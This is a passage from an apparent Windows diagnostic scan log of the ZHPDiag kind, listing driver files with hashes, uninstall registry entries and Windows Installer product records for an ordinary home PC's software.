[MD5.7B3BCF14103863D755AB1D5A5E76CA10] - [11/11/2010 02:11:50] - (.Copyright (c) 1997-2010  MCCI Corporation  - Windows 2000/XP support functions.) - [15.07 Ko] - (5.16.0.2) - C:\Windows\System32\Drivers\sscdcmnt.sys
[MD5.4CB09E77593DBD8D7AF33B37375CA715] - [11/11/2010 02:11:50] - (.Copyright (c) 1997-2010  MCCI Corporation  - SAMSUNG Mobile Modem Filter Driver.) - [18.57 Ko] - (5.16.0.2) - C:\Windows\System32\Drivers\sscdmdfl.sys
[MD5.C7B4CF53497A6E5363F3439427663882] - [11/11/2010 02:11:50] - (.Copyright (c) 1997-2010  MCCI Corporation  - SAMSUNG Mobile Modem WDM.) - [168.07 Ko] - (5.16.0.2) - C:\Windows\System32\Drivers\sscdmdm.sys
[MD5.963EA26BF86509CAEB50AEC06F8813F1] - [11/11/2010 02:11:52] - (.Copyright (c) 1997-2010  MCCI Corporation  - Windows 2000/XP support functions.) - [15.57 Ko] - (5.16.0.2) - C:\Windows\System32\Drivers\sscdwh.sys
[MD5.963EA26BF86509CAEB50AEC06F8813F1] - [11/11/2010 02:11:52] - (.Copyright (c) 1997-2010  MCCI Corporation  - Windows 2000/XP support functions.) - [15.57 Ko] - (5.16.0.2) - C:\Windows\System32\Drivers\sscdwhnt.sys
[MD5.D21FF3592DAEE244EE8376830A672B52] - [21/09/2009 02:43:52] - (.Copyright (c) 1997-2009  MCCI Corporation  - SAMSUNG Mobile USB Device 1.0 Driver.) - [124.5 Ko] - (5.0.0.0) - C:\Windows\System32\Drivers\ss_bus.sys
[MD5.B96A2A5FED060C0CF9F2A75ABF3B5CDC] - [21/09/2009 02:43:52] - (.Copyright (c) 1997-2009  MCCI Corporation  - Windows 2000/XP support functions.) - [15 Ko] - (5.0.0.0) - C:\Windows\System32\Drivers\ss_cm.sys
[MD5.B96A2A5FED060C0CF9F2A75ABF3B5CDC] - [21/09/2009 02:43:52] - (.Copyright (c) 1997-2009  MCCI Corporation  - Windows 2000/XP support functions.) - [15 Ko] - (5.0.0.0) - C:\Windows\System32\Drivers\ss_cmnt.sys
[MD5.451DB3D10E6112E06B4506D4A7BECEC1] - [21/09/2009 02:43:52] - (.Copyright (c) 1997-2009  MCCI Corporation  - SAMSUNG Mobile USB Modem 1.0 Filter Driver.) - [18.5 Ko] - (5.0.0.0) - C:\Windows\System32\Drivers\ss_mdfl.sys
[MD5.EF40C8A268A5263A0EF48FED8E57CBED] - [21/09/2009 02:43:52] - (.Copyright (c) 1997-2009  MCCI Corporation  - SAMSUNG Mobile USB Modem 1.0 Driver.) - [157.5 Ko] - (5.0.0.0) - C:\Windows\System32\Drivers\ss_mdm.sys
[MD5.AB90FDA84DD20FAF3408A95E02ED7F53] - [21/09/2009 02:43:52] - (.Copyright (c) 1997-2009  MCCI Corporation  - Windows 2000/XP support functions.) - [15.5 Ko] - (5.0.0.0) - C:\Windows\System32\Drivers\ss_wh.sys
[MD5.AB90FDA84DD20FAF3408A95E02ED7F53] - [21/09/2009 02:43:52] - (.Copyright (c) 1997-2009  MCCI Corporation  - Windows 2000/XP support functions.) - [15.5 Ko] - (5.0.0.0) - C:\Windows\System32\Drivers\ss_whnt.sys
[MD5.F3817967ED533D08327DC73BC4D5542A] - [13/07/2009 23:59:33] - (.Promise Technology - Promise  SuperTrak EX Series Driver for Windows.) - [24.08 Ko] - (5.0.1.1) - C:\Windows\System32\Drivers\stexstor.sys
[MD5.E5689D93FFE4E5D66C0178761240DD54] - [14/07/2009 01:19:50] - (.Copyright (C) VIA Technologies, Inc. 2000-2007 - VIA Generic PCI IDE Bus Driver.) - [17.08 Ko] - (6.0.6000.170) - C:\Windows\System32\Drivers\viaide.sys
[MD5.5E2016EA6EBACA03C04FEAC5F330D997] - [10/06/2009 22:37:58] - (.Copyright (C) VIA Technologies 1992-2007 - VIA RAID DRIVER FOR AMD-X86-64.) - [158.08 Ko] - (6.0.6000.6210) - C:\Windows\System32\Drivers\vsmraid.sys
[MD5.EEAC7855C9B0B79B0B7C04C68C2445EA] - [03/06/2008 14:38:30] - (.Copyright © 2008 Winbond Electronics Corp. - Winbond HID CIR Receiver.) - [25.5 Ko] - (7.1.64.1013) - C:\Windows\System32\Drivers\winbondhidcir.sys

---------- | Uninstall

[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\AddressBook] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Broadcom 802.11 Network Adapter] : (Broadcom 802.11 Network Adapter.-.Broadcom Corporation) -> "C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\Driver\bcmwlu00.exe" verbose /rootkey="Software\Broadcom\802.11\UninstallInfo" /rootdir="C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\Driver"
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\CCleaner] : (CCleaner.-.Piriform) -> "C:\Program Files\CCleaner\uninst.exe"
[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Connection Manager] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\DirectDrawEx] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\DXM_Runtime] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Fontcore] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IE40] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IE4Data] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IE5BAKEX] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IEData] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\McAfee Security Scan] : (McAfee Security Scan Plus.-.McAfee, Inc.) -> "C:\Program Files\McAfee Security Scan\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\MobileOptionPack] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\MPlayer2] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\SchedulingAgent] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\WIC] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\WinRAR archiver] : (WinRAR 5.01 (64-bit).-.win.rar GmbH) -> C:\Program Files\WinRAR\uninstall.exe
[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{9EA64B79-30A1-F52E-D801-B07CF05FFFAF}] : (ccc-utility64.-.ATI) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{F37A899E-1745-52F5-658F-9A4DA4D46BB7}] : (AMD Catalyst Install Manager.-.Advanced Micro Devices, Inc.) -> msiexec /q/x{F37A899E-1745-52F5-658F-9A4DA4D46BB7} REBOOT=ReallySuppress
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\AddressBook] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Adobe AIR] : (Adobe AIR.-.Adobe Systems Incorporated) -> C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Resources\Adobe AIR Updater.exe -arp:uninstall
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX] : (Adobe Flash Player 22 ActiveX.-.Adobe Systems Incorporated) -> C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_22_0_0_210_ActiveX.exe -maintain activex
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI] : (Adobe Flash Player 22 NPAPI.-.Adobe Systems Incorporated) -> C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_22_0_0_209_Plugin.exe -maintain plugin
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\BurnAware Free_is1] : (BurnAware Free 5.5.-.Burnaware Technologies) -> "C:\Program Files (x86)\BurnAware Free\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Camfrog] : (Camfrog Video Chat 6.11.-.Camshare, Inc.) -> "C:\Program Files (x86)\Camfrog\Camfrog Video Chat\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Camfrog 6.4] : (Camfrog Video Chat 6.4.-.Camshare Inc.) -> "C:\Program Files (x86)\Camfrog\Camfrog Video Chat\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Chronotron_NSIS] : (Chronotron Plug-in for Winamp/WMP 9 (remove only).-.) -> "C:\Program Files (x86)\Chronotron Inc\Chronotron\uninst-chronotron.exe"
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Connection Manager] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\DirectDrawEx] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Fontcore] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Free Audio CD Burner_is1] : (Free Audio CD Burner.-.DVDVideoSoft Ltd.) -> C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\Uninstall.exe /app FreeAudioCDBurner
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Google Chrome] : (Google Chrome.-.Google Inc.) -> "C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.103\Installer\setup.exe" --uninstall --multi-install --chrome --system-level
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IE40] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IE4Data] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IE5BAKEX] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IEData] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\LManager] : (Launch Manager.-.Acer Inc.) -> C:\Windows\UNINSTLMv4.EXE LMv4.UNI
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Malwarebytes Anti-Malware_is1] : (Malwarebytes Anti-Malware version 2.2.1.1043.-.Malwarebytes) -> "C:\Program Files (x86)\Malwarebytes Anti-Malware\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\McAfee Security Scan] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\MobileOptionPack] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Mozilla Firefox 47.0 (x86 fr)] : (Mozilla Firefox 47.0 (x86 fr).-.Mozilla) -> "C:\Program Files (x86)\mozilla firefox\uninstall\helper.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\MozillaMaintenanceService] : (Mozilla Maintenance Service.-.Mozilla) -> "C:\Program Files (x86)\Mozilla Maintenance Service\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\PaceMaker plug-in] : (PaceMaker plug-in for Winamp.-.PaceMaker plug-inc.) -> C:\Program Files (x86)\Winamp\Plugins\Uninstall PaceMaker.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Picasa 3] : (Picasa 3.-.Google, Inc.) -> "C:\Program Files (x86)\Google\Picasa3\Uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Quintessential Player] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\SchedulingAgent] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\SnowFox YouTube Downloader HD_is1] : (SnowFox YouTube Downloader HD 2.2.0.0.-.) -> "C:\Program Files (x86)\SnowFox Software\YouTube Downloader HD\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\VLC media player] : (VLC media player.-.VideoLAN) -> C:\Program Files (x86)\VideoLAN\VLC\uninstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\WIC] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Winamp] : (Winamp.-.Nullsoft, Inc) -> "C:\Program Files (x86)\Winamp\UninstWA.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Winamp3] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\ZHPFix_is1] : (ZHPFix 2015.-.Nicolas Coolman) -> "C:\Program Files (x86)\ZHPFix\unins000.exe"
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{016095EE-5BB3-791C-A558-06412FF78691}] : (CCC Help Russian.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{10F4A085-EA81-594B-C0B8-ADF013D26B8E}] : (CCC Help Turkish.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{14EC371D-145C-9AC3-B3A8-EA90C6B0325E}] : (PX Profile Update.-.AMD) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{1942E836-414C-4414-672B-93FCC8CC18AB}] : (CCC Help Danish.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{2091F234-EB58-4B80-8C96-8EB78C808CF7}] : (Facebook Video Calling 3.1.0.521.-.Skype Limited) -> MsiExec.exe /X{2091F234-EB58-4B80-8C96-8EB78C808CF7}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{2349E803-9B10-7B83-C1CB-9C9F16739F60}] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217010FB}] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217011FB}] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218073F0}] : (Java 8 Update 73.-.Oracle Corporation) -> MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83218073F0}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218091F0}] : (Java 8 Update 91.-.Oracle Corporation) -> MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83218091F0}
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{284AE43C-30E4-B57E-A234-05496D05AB68}] : (Catalyst Control Center Graphics Previews Vista.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{32354BAB-8BAE-7189-6E3F-922D47292D3D}] : (CCC Help Czech.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{35E13884-BAC3-5F4A-799B-05F882E0BD9F}] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}] : (Intel(R) Rapid Storage Technology.-.Intel Corporation) -> C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\Uninstall\setup.exe -uninstall
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}] : (Java Auto Updater.-.Oracle Corporation) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{4E242AB2-86A7-4231-82A9-1E4226D23CA8}] : (Catalyst Control Center - Branding.-.ATI) -> MsiExec.exe /I{4E242AB2-86A7-4231-82A9-1E4226D23CA8}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{51C7AD07-C3F6-4635-8E8A-231306D810FE}] : (Cisco LEAP Module.-.Cisco Systems, Inc.) -> MsiExec.exe /I{51C7AD07-C3F6-4635-8E8A-231306D810FE}
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{5735A865-CD31-5788-DA38-AAB06EAED9F4}] : (CCC Help Hungarian.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{5901E428-EC91-71EE-BA56-9417E40BE182}] : (ccc-core-static.-.Nom de votre société) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{60AA5155-39C7-14AA-FB4B-489B1C8DE9A1}] : (CCC Help Chinese Traditional.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}] : (Google Update Helper.-.Google Inc.) -> MsiExec.exe /I{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}] : (Cisco EAP-FAST Module.-.Cisco Systems, Inc.) -> MsiExec.exe /I{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}] : (Intel(R) Management Engine Components.-.Intel Corporation) -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\Uninstall\setup.exe -uninstall
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{6933C2BA-C67D-42C7-8C77-1FF4B364AF54}] : (.-.) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{72449E65-4852-2FD9-F603-D77E39DD3CF6}] : (CCC Help Finnish.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7703542C-3842-C5EE-2452-B006F441A162}] : (CCC Help Polish.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7BA2A154-81ED-4302-BAB6-20BAEE6233A6}] : (Ableton Live 9 Trial.-.Ableton) -> MsiExec.exe /X{7BA2A154-81ED-4302-BAB6-20BAEE6233A6}
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7F529418-344D-3792-F7B6-04EB805F5931}] : (CCC Help English.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{91F29ED6-6C82-F83D-BF8D-3E67D18E7249}] : (Catalyst Control Center Localization All.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{97C82B44-D408-4F14-9252-47FC1636D23E}_is1] : (IZArc 4.1.7.-.Ivan Zahariev) -> "C:\Program Files (x86)\IZArc\unins000.exe"
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{990EEE1A-4D64-16AF-A944-AD97AE080D26}] : (CCC Help German.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{9A98031B-0A1A-AFDC-87F4-AAFDC1E97B7D}] : (CCC Help Portuguese.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{AC76BA86-0804-1033-1959-001824191728}] : (Adobe Refresh Manager.-.Adobe Systems Incorporated) -> MsiExec.exe /I{AC76BA86-0804-1033-1959-001824191728}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}] : (Adobe Acrobat Reader DC - Français.-.Adobe Systems Incorporated) -> MsiExec.exe /I{AC76BA86-7AD7-1036-7B44-AC0F074E4100}
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{AEAA9D8A-A347-0FC4-5CAF-D9F2236FCF49}] : (CCC Help French.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{AEB43F42-8F9D-DBD8-0B11-941CC27C174A}] : (CCC Help Norwegian.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{BD21728C-22C5-2D69-2F52-C4437E8FF02E}] : (Catalyst Control Center InstallProxy.-.Advanced Micro Devices, Inc.) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{C2EE73BE-CD73-6EC9-A5A0-0E080A60A00E}] : (CCC Help Chinese Standard.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{CE94DD89-7404-B4B9-E713-E55CC0AB6C3B}] : (.-.) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{CFCF4223-BC7B-110C-4E19-5FF025721C4B}] : (CCC Help Spanish.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{E17D581A-6949-6A53-7A18-E80C6BDCC800}] : (CCC Help Italian.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{E96D1A04-B0B4-0788-D70F-0A9BB9C503BD}] : (CCC Help Korean.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{EB5E21BC-AC56-A45D-5593-A1C55A380677}] : (CCC Help Swedish.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{ECEDC447-3EED-6F90-CB39-0A49BD2D63DE}] : (CCC Help Thai.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}] : (Cisco PEAP Module.-.Cisco Systems, Inc.) -> MsiExec.exe /I{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{EF45FBBD-3CE8-698B-AC44-C693468F53D3}] : (CCC Help Greek.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{F08BDFA2-D39D-5C4A-BC2A-3461DF3A9CFB}] : (.-.) -> C:\PROGRA~3\INSTAL~1\{68BDE~1\Setup.exe /remove /q0
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}] : (Realtek High Definition Audio Driver.-.Realtek Semiconductor Corp.) -> RunDll32 C:\PROGRA~2\COMMON~1\INSTAL~1\PROFES~1\RunTime\11\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files (x86)\InstallShield Installation Information\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}\Setup.exe"  -removeonly
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{F2E04A40-3EA7-42F8-B7CC-B6E7A39DC150}] : (Adobe AIR.-.Adobe Systems Incorporated) -> MsiExec.exe /I{F2E04A40-3EA7-42F8-B7CC-B6E7A39DC150}
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{F73D3B6A-4E5F-E93D-C7C3-65DE80BEE0E7}] : (CCC Help Dutch.-.ATI) -> 
[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{F9D7691A-E3CD-EF15-DE38-EDF0BB1E345F}] : (CCC Help Japanese.-.ATI) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{FC965A47-4839-40CA-B618-18F486F042C6}] : (Skype™ 7.25.-.Skype Technologies S.A.) -> MsiExec.exe /X{FC965A47-4839-40CA-B618-18F486F042C6}

---------- | Installer

[HKCR\Installer\Products\04A40E2F7AE38F247BCC6B7E3AD91C05] : Adobe AIR
[HKCR\Installer\Products\24F34BEAD9F88DBDB01149C12CC771A4] : CCC Help Norwegian -> C:\Windows\Installer\{AEB43F42-8F9D-DBD8-0B11-941CC27C174A}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\2BA242E47A681324289AE124622DC38A] : Catalyst Control Center - Branding -> C:\Windows\Installer\{4E242AB2-86A7-4231-82A9-1E4226D23CA8}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\3224FCFCB7CBC011E491F50F5227C1B4] : CCC Help Spanish -> C:\Windows\Installer\{CFCF4223-BC7B-110C-4E19-5FF025721C4B}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\40A1D69E4B0B88707DF0A0B99B5C30DB] : CCC Help Korean -> C:\Windows\Installer\{E96D1A04-B0B4-0788-D70F-0A9BB9C503BD}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\451A2AB7DE182034AB6B02ABEE26336A] : Ableton Live 9 Trial
[HKCR\Installer\Products\4EA42A62D9304AC4784BF2381208190F] : Java 8 Update 91 -> C:\Program Files (x86)\Java\jre1.8.0_91\\bin\javaws.exe
[HKCR\Installer\Products\4EA42A62D9304AC4784BF2381208370F] : Java 8 Update 73 -> C:\Program Files (x86)\Java\jre1.8.0_73\\bin\javaws.exe
[HKCR\Installer\Products\52744B0D6663D294EB6F85A741DBB99D] : MSVCRT_amd64
[HKCR\Installer\Products\5515AA067C93AA41BFB484B9C1D89E1A] : CCC Help Chinese Traditional -> C:\Windows\Installer\{60AA5155-39C7-14AA-FB4B-489B1C8DE9A1}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\568A537513DC8875AD83AA0BE6EA9D4F] : CCC Help Hungarian -> C:\Windows\Installer\{5735A865-CD31-5788-DA38-AAB06EAED9F4}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\56E9442725849DF26F307DE793DDC36F] : CCC Help Finnish -> C:\Windows\Installer\{72449E65-4852-2FD9-F603-D77E39DD3CF6}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\580A4F0118AEB4950C8BDA0F312DB6E8] : CCC Help Turkish -> C:\Windows\Installer\{10F4A085-EA81-594B-C0B8-ADF013D26B8E}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\5D6775DE4B957B64FA18F5D2497D6C04] : Cisco PEAP Module
[HKCR\Installer\Products\638E2491C414414476B239CF8CCC81BA] : CCC Help Danish -> C:\Windows\Installer\{1942E836-414C-4414-672B-93FCC8CC18AB}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\68AB67CA408033019195008142917182] : Adobe Refresh Manager -> C:\Windows\Installer\{AC76BA86-0804-1033-1959-001824191728}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\68AB67CA7DA76301B744CAF070E41400] : Adobe Acrobat Reader DC - Français -> C:\Windows\Installer\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}\SC_Reader.ico
[HKCR\Installer\Products\69A46712847638B4987EA70536FB51C6] : Movie Maker
[HKCR\Installer\Products\6DE92F1928C6D38FFBD8E3761DE82794] : Catalyst Control Center Localization All -> C:\Windows\Installer\{91F29ED6-6C82-F83D-BF8D-3E67D18E7249}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\70DA7C156F3C5364E8A83231608D01EF] : Cisco LEAP Module
[HKCR\Installer\Products\744CDECEDEE309F6BC93A094DBD236ED] : CCC Help Thai -> C:\Windows\Installer\{ECEDC447-3EED-6F90-CB39-0A49BD2D63DE}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\74A569CF9384AC046B81814F680F246C] : Skype™ 7.25 -> C:\Windows\Installer\{FC965A47-4839-40CA-B618-18F486F042C6}\SkypeIcon.exe
[HKCR\Installer\Products\7810FB462D3FB89499AE61A39FEAE69C] : Cisco EAP-FAST Module
[HKCR\Installer\Products\7BD4C90EC03660F46A13E87A329932FA] : D3DX10
